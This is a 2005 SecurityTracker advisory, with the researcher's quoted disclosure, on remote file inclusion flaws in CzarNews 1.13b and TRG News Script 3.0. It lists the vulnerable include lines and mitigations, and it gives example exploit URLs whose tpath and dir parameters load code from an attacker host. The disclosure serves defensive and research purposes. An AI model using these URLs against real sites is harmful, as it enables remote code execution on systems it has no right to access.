SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   CzarNews Vendors:   Czaries Network
CzarNews Include File Hole Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1013486
SecurityTracker URL:  http://securitytracker.com/id/1013486
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 21 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.13b
Description:   Frank 'brOmstar' Reissner from [In]Security Research reported a vulnerability in CzarNews. A remote user can execute arbitrary commands on the target system.

Several scripts do not properly validate user-supplied input to prevent remote PHP code from being included. A remote user can supply a URL with a specially crafted 'dir' parameter to cause arbitrary PHP code from a remote server to be included and executed by the target web service. The PHP code, including operating system commands, will run with the privileges of the target web service.

The following files are affected:

install\article.php
install\authorall.php
install\comment.php
install\display.php
install\displayall.php

Other files are also affected.

If 'register_globals' and 'allow_url_fopen' are set to 'on' in the 'php.ini' configuration file, then this flaw can be exploited.

A demonstration exploit URL to execute 'newsconfig.php' from the attacker's system is provided:

http://[target]/research/news/trg_news30/trgnews/install/article.php?dir=http://[attacker]
Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.czaries.net/scripts/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents
Subject:  Two Php Application Vulnerabilties


Two little vulns I have discovered

#################################################################
#
#  [In]Security Research 2005-001 	
#
#  	Affected Software: 	CzarNews (v1.13b) 
#	Impact:			Remote File Inclusion	
#	Url:			http://www.czaries.net/scripts/
#	
#	Date:			2k5-03-18
#
#################################################################

Software:
=========

CzarNews (v1.13b)
News Manager - Requires: php 4.x (safe_mode OFF), MySQL
Released on: 10-13-2004 @ 7:17 PM by Czaries
A free full-featured news manager that allows you to post news effortlessly
and easily. 
Includes: Unlimited users, each with custom permissions, unlimited posting
categories, 
web-based configuration, and a complete auto-installer for a quick setup in
minutes.



Vulnerability:
==============

Remote file inclusion in headlines.php and news.php via the tpath parameter.


headlines.php
-------------

require_once($tpath . "cn_config.php");


news.php
--------

require_once($tpath . "cn_config.php");


Example:
========

If register_globals=on and allow_url_fopen=on:

http://192.168.0.115/research/news/CzarNewsv113b/headlines.php?tpath=http://
attackerip/
http://192.168.0.115/research/news/CzarNewsv113b/news.php?tpath=http://attac
kerip/

where the file for inclusion must be named cn_config.php ->
http://attackerip/cn_config.php


Solution:
=========

Make a simple check if the file exits with the file_exits function or
deactivate 
register_globals || allow_url_fopen.


#################################################################

greetings 2 buzzdee and the whole gsO team  ;) 





And 

#################################################################
#
#  [In]Security Research 2005-002 	
#
#  	Affected Software: 	TRG News Script(3.0)
#	Impact:			Remote File Inclusion	
#	Url:
http://www.hotscripts.com/jump.php?listing_id=17852&jump_type=1
#	
#	Date:			2k5-03-19
#
#################################################################

Software:
=========

The TRG News Script is an easily customizable news posting script. By simply
pasting a small block of code on your page, the TRG News Script will display
your newly posted material there. This script requires an SQL database.


Vulnerability:
==============

Remote file inclusion in 

install\article.php
install\authorall.php
install\comment.php
install\display.php
install\displayall.php


and many more files


via the dir parameter.


include("$dir/newsconfig.php");

or

include("$dir/authorall.class.php");

or 

include("$dir/comments.class.php");

or

include("$dir/news.class.php");

or

include("$dir/newsall.class.php");

or

and more and more  ;) 


Example:
========

If register_globals=on and allow_url_fopen=on:

http://192.168.0.115/research/news/trg_news30/trgnews/install/article.php?di
r=http://attackerip/

where the file for inclusion must be named newsconfig.php ->
http://attackerip/newsconfig.php


Solution:
=========

Make a simple check if the file exits with the file_exits function or
deactivate 
register_globals || allow_url_fopen.


#################################################################

greetings 2 buzzdee and the whole gsO team  ;)


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC